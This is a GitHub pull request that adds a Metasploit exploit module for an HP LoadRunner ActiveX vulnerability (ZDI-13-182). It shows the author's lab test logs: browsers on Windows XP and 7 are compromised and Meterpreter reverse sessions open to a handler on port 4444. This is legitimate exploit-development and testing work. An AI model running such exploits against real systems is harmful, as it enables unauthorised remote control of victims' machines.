Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for ZDI-13-182 #2290

Merged
merged 3 commits into from Aug 27, 2013
Merged

Add module for ZDI-13-182 #2290

merged 3 commits into from Aug 27, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested with HP LoadRunner 11.50 T7177-15028 which includes LrWebIERREWrapper.dll 11.50.2216.0 (vulnerable activex)

Module testing:

  • IE 7 WIN XP
msf exploit(hp_loadrunner_writefilebinary) > [*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /FW1LWHRUM
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 7 on Windows XP SP3
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:49287) at 2013-08-25 23:04:43 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.3 - Meterpreter session 3 closed.  Reason: User exit
  • IE 8 Win XP
msf exploit(hp_loadrunner_writefilebinary) > 
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /U7vg2FQpazSh
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /U7vg2FQpazSh
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:65478) at 2013-08-25 22:50:45 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.3 - Meterpreter session 2 closed.  Reason: User exit
  • IE 8 / Win 7 SP1
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /EeHZTmef4ROfic
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 8 on Windows 7
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:50282) at 2013-08-26 07:47:48 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.0.3:4444 -> 192.168.0.3:50282 (192.168.172.207)

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
  • IE 9 / WIN 7 SP1
msf exploit(hp_loadrunner_writefilebinary) > [*] 10.6.0.165       hp_loadrunner_writefilebinary - Requesting: /sk1ZSrdDv
[*] 10.6.0.165       hp_loadrunner_writefilebinary - Target selected as: IE 9 on Windows 7
[*] 10.6.0.165       hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 10.6.0.165       hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50797) at 2013-08-27 09:56:43 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.207 - Meterpreter session 1 closed.  Reason: User exit

wchen-r7 added a commit that referenced this pull request Aug 27, 2013
@wchen-r7
Land #2290 - HP LoadRunner lrFileIOService ActiveX Vulnerability
b0226ca
@wchen-r7 wchen-r7 merged commit f59f57e into rapid7:master Aug 27, 2013
@jvazquez-r7 jvazquez-r7 deleted the zdi_13_182 branch November 18, 2014 15:58
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7